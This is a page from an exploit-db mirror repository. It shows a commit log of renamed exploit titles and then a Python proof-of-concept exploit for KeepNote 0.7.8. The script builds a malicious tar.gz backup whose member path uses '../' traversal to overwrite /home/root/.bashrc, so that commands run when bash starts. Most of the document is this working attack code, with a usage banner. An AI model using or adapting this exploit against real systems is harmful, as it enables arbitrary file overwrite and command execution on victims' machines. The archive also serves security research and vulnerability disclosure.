bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/multiple/local/40440.py
Offensive Security fa1b17f699 DB: 2016-09-30 
1 new exploits

Microsoft Windows - RPC DCOM Remote Exploit (18 Targets)
Microsoft Windows - 'RPC DCOM' Remote Exploit (48 Targets)
Microsoft Windows - 'RPC DCOM' Remote Exploit (1)
Microsoft Windows - 'RPC DCOM' Remote Exploit (2)

Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal Targets)
Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal)

Microsoft Windows 2000/XP - RPC Remote (non exec memory) Exploit
Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit

LimeWire 4.1.2 < 4.5.6 - Inappropriate Get Request Remote Exploit
LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit

PMSoftware Simple Web Server - (GET Request) Remote Buffer Overflow
PMSoftware Simple Web Server - GET Request Remote Buffer Overflow

CUPS Server 1.1 - (Get Request) Denial of Service
CUPS Server 1.1 - GET Request Denial of Service

BlueCoat WinProxy 6.0 R1c - (GET Request) Denial of Service
BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service

TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)
TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)

Fenice Oms 1.10 - (long get request) Remote Buffer Overflow
Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow

Multi-Threaded TFTP 1.1 - (Long Get Request) Denial of Service
Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service

Essentia Web Server 2.15 - (GET Request) Remote Denial of Service
Essentia Web Server 2.15 - GET Request Remote Denial of Service

webdesproxy 0.0.1 - (GET Request) Remote Buffer Overflow
webdesproxy 0.0.1 - GET Request Remote Buffer Overflow

webdesproxy 0.0.1 - (GET Request) Remote Root Exploit (exec-shield)
webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)

Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname)
Microsoft Windows Message Queuing Service - RPC Buffer Overflow

Netgear WGR614v9 - Wireless Router Get Request Denial of Service
Netgear WGR614v9 Wireless Router - GET Request Denial of Service
XBMC 8.10 - (GET Requests) Multiple Remote Buffer Overflow (PoC)
XBMC 8.10 (Windows) - (GET Request) Remote Buffer Overflow
XBMC 8.10 - GET Requests Multiple Remote Buffer Overflow (PoC)
XBMC 8.10 (Windows) - GET Request Remote Buffer Overflow

httpdx 0.5b FTP Server - (USER) Remote Buffer Overflow (SEH)
httpdx 0.5b - FTP Server (USER) Remote Buffer Overflow (SEH)
Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow (PoC)
Mereo 1.8.0 - (Get Request) Remote Denial of Service
Zervit Web Server 0.04 - GET Request Remote Buffer Overflow (PoC)
Mereo 1.8.0 - GET Request Remote Denial of Service

httpdx 0.5b FTP Server - (CWD) Remote Buffer Overflow (SEH)
httpdx 0.5b - FTP Server (CWD) Remote Buffer Overflow (SEH)

httpdx 0.8 FTP Server - Delete/Get/Create Directories/Files Exploit
httpdx 0.8 - FTP Server Delete/Get/Create Directories/Files Exploit

ARD-9808 DVR Card Security Camera - (GET Request) Remote Denial of Service
ARD-9808 DVR Card Security Camera - GET Request Remote Denial of Service

Kolibri+ WebServer 2 - (Get Request) Denial of Service
Kolibri+ WebServer 2 - GET Request Denial of Service

Kolibri+ WebServer 2 - (GET Request) Remote Overwrite (SEH)
Kolibri+ WebServer 2 - GET Request Remote Overwrite (SEH)

httpdx Web Server 1.4 - (Host Header) Remote Format String Denial of Service
httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service

httpdx 1.4 - Get Request Buffer Overflow
httpdx 1.4 - GET Request Buffer Overflow

Httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)
httpdx 1.5.4 - Multiple Denial of Service Vulnerabilities (http-ftp) (PoC)

HTTPDX - tolog() Function Format String (1)
httpdx - tolog() Function Format String (1)

HTTPDX - tolog() Function Format String (2)
httpdx - tolog() Function Format String (2)

HTTPDX - h_handlepeer() Function Buffer Overflow (Metasploit)
httpdx - h_handlepeer() Function Buffer Overflow (Metasploit)

glibc LD_AUDIT Arbitrary DSO - Load Privilege Escalation
glibc - LD_AUDIT Arbitrary DSO Load Privilege Escalation

Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)
Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)

httpdx 1.5.4 - Remote HTTP Server Denial of Service
httpdx 1.5.4 - HTTP Server Remote Denial of Service

Working Resources BadBlue 1.7.3 - Get Request Denial of Service
Working Resources BadBlue 1.7.3 - GET Request Denial of Service
KeepNote 0.7.8 - Command Execution

My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service
My Web Server 1.0.1/1.0.2 - Long GET Request Denial of Service

Snowblind Web Server 1.0/1.1 - (GET Request) Buffer Overflow
Snowblind Web Server 1.0/1.1 - GET Request Buffer Overflow

Proxomitron Proxy Server - Long Get Request Remote Denial of Service
Proxomitron Proxy Server - Long GET Request Remote Denial of Service
2016-09-30 05:01:16 +00:00

45 lines
1.6 KiB
Python
Executable file
Raw Blame History

# Title : KeepNote 0.7.8 Remote Command Execution
# Date : 29/09/2016
# Author : R-73eN
# Twitter : https://twitter.com/r_73en
# Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7)
# Software : http://keepnote.org/index.shtml#download
# Vendor : ~
#
# DESCRIPTION:
#
# When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters
# which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions).
# This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run.
# There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application
# as root (default in kali linux which this bug is tested).
#
#
banner = ""
banner +=" ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import tarfile, sys
if(len(sys.argv) != 2):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit(0)
print "[+] Creating Exploit File [+]"
filename = "KeepNoteBackup.tar.gz"
path = "../../../../../../../home/root/.bashrc"
tf = tarfile.open(filename,"w:gz")
tf.add(sys.argv[1], path)
tf.close()
print "[+] Created KeepNoteBackup.tar.gz successfully [+]"
Reference in a new issue View git blame Copy permalink